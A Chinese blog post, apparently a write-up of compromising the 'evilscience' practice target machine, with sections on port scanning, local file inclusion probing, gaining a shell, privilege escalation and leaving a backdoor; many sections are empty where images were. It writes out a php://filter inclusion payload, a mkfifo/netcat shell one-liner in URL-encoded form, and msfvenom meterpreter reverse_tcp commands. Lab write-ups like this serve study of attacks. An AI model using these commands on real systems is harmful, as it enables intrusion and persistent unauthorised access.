靶机记录(十二):evilscience

目录

主机发现

端口扫描

SSH尝试连接

Web渗透

漏洞挖掘

GetShell 

 法一

 法二(MSF)

 提权

 法一(失败了)

 法二(脏牛,也失败了。。)​​​

 法三

 法四

 法五

 flag

清痕迹,留后门


主机发现

端口扫描

 

 SSH尝试连接

 

Web渗透

漏洞挖掘

试试其他的路径 :

/var/log/apache2/access.log
/var/log/apache/access.log     -----WEB 日志文件
/var/www/log/access.log 

                                全失败

尝试读取以下配置文件 :

/etc/apache2/apache2.conf       失败



尝试伪协议读取:
file=php://filter/convert.base64-encode/resource=index.php    失败

PHP伪协议读取试试也是失败的

 由于开了22,80,web日志不行,看一下 SSH 日志

 

GetShell 

 法一

依次执行

mkfifo /tmp/t
编码:mkfifo+/tmp/t

cat /tmp/t | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/t
编码:cat+/tmp/t+|+/bin/sh+-i+2>%261+|+nc%20-l+1234+>+/tmp/t;

 

 法二(MSF)

生成木马脚本:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机上的端口 -f elf > GetShell.elf

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp 
set lhost 攻击机IP
set lport 攻击机端口号
run

 

 提权

 法一(失败了)

在靶机上下载后 解析的时候都失败了  -> 啥也不是

 法二(脏牛,也失败了。。)

 法三

 

这个文件 而这个文件是具有s权限的  
!!有的S标志位文件可写,有的不可写但是可以执行通过管道符一并执行我们的马,有的不可写但是可以调用,通过伪造同样文件名来执行eg:$PATH

 

 法四

 法五

 

 flag

清痕迹,留后门

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值